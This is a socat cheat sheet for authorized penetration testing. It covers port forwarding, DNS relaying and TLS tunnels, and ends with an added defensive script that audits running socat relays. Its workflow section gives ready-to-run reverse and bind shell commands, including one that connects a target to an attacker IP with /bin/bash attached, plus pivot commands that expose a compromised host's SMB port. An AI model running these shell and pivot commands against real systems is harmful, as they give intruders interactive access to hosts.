socat Cheat Sheet
Bidirectional data relay for shells, port forwarding, and protocol bridging on authorized networks.
Overview
socat creates relays between sockets, ptys, and files—more flexible than netcat for stable shells, port forwarding, and TLS tunnels during authorized internal testing.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y socat
Essential commands
Listen and forward to remote service
socat TCP-LISTEN:8080,fork TCP:internal.host:80
Reverse shell listener
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
Common workflows
Stable reverse shell (attacker):
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
Target
socat TCP:10.10.14.5:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
Forward local 1080 to internal RDP
socat TCP-LISTEN:1080,fork TCP:10.10.10.50:3389
On compromised host: expose internal 445 to attacker 8445
socat TCP:10.10.14.5:8445 TCP:127.0.0.1:445
UDP DNS relay:
socat UDP4-LISTEN:53,fork UDP4:8.8.8.8:53
Generate cert once, then:
socat OPENSSL-LISTEN:443,cert=server.pem,key=server.pem,verify=0,fork TCP:127.0.0.1:22
socat OPENSSL:attacker.example:443,verify=0 TCP:127.0.0.1:22
Flags reference
| Option | Meaning |
|---|---|
| TCP-LISTEN:port | Listen TCP |
| TCP:host:port | Connect TCP |
| UDP4-LISTEN:port | Listen UDP |
| fork | Handle multiple clients |
| reuseaddr | Reuse bind address |
| EXEC:cmd | Run command |
| pty | Pseudo-TTY for shell |
| OPENSSL-LISTEN / OPENSSL | TLS listener/client |
| cert=,key= | TLS certificate files |
| verify=0 | Skip cert verify (testing only) |
Tips
- pty,stderr,setsid,sigint,sane produces usable interactive shells over socat.
- Use fork on listeners for multiple connections during pivoting.
- Prefer socat over nc when you need OPENSSL or reliable double connections.
- Document open relays; close listeners after engagement phase.
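One way to act on the last tip, as an added example that is not part of the original cheat sheet: a small inventory of running socat processes that records each listening address and marks relays that fork, run a command, or skip TLS verification. The helper name `audit_socat`, its flag labels, and the `SAMPLE_PS` data are assumptions made for this example; the sample is constructed from the commands on this page.

```sh
#!/bin/sh
# Added example: inventory socat processes so relays can be documented and closed.
# SAMPLE_PS is constructed `ps -eo pid=,args=` output, not taken from a real host.
SAMPLE_PS='1201 socat TCP-LISTEN:8080,fork TCP:internal.host:80
1315 socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
1422 socat OPENSSL-LISTEN:443,cert=server.pem,key=server.pem,verify=0,fork TCP:127.0.0.1:22
1500 sshd: /usr/sbin/sshd -D
1611 /usr/bin/socat UDP4-LISTEN:53,fork UDP4:8.8.8.8:53
1702 socat TCP:10.10.14.5:8445 TCP:127.0.0.1:445'

# audit_socat (hypothetical helper): reads "PID ARGS" lines on stdin and prints
#   PID <TAB> listening address or "-" <TAB> flags or "-"
# Flags: fork (multi-client listener), exec (EXEC:/SYSTEM: address),
#        tls-noverify (verify=0 on an OPENSSL address).
audit_socat() {
    awk '
    $2 == "socat" || $2 ~ /\/socat$/ {
        listen = "-"; flags = ""
        for (i = 3; i <= NF; i++) {
            if ($i ~ /^-/) continue            # skip socat command-line switches
            n = split($i, opt, ",")            # opt[1] = address, rest = options
            addr = toupper(opt[1])             # address keywords are case-insensitive
            if (addr ~ /^[A-Z0-9]+-LISTEN:/) listen = opt[1]
            if (addr ~ /^(EXEC|SYSTEM):/) flags = flags "exec,"
            for (j = 2; j <= n; j++) {
                o = tolower(opt[j])
                if (o == "fork") flags = flags "fork,"
                if (o == "verify=0") flags = flags "tls-noverify,"
            }
        }
        sub(/,$/, "", flags)
        if (flags == "") flags = "-"
        printf "%s\t%s\t%s\n", $1, listen, flags
    }'
}

# Offline demo on the sample; on a live host: ps -eo pid=,args= | audit_socat
printf '%s\n' "$SAMPLE_PS" | audit_socat
```

Rows with a listening address are the relays to record in the engagement log and stop when the phase ends; `exec` and `tls-noverify` rows deserve the first look.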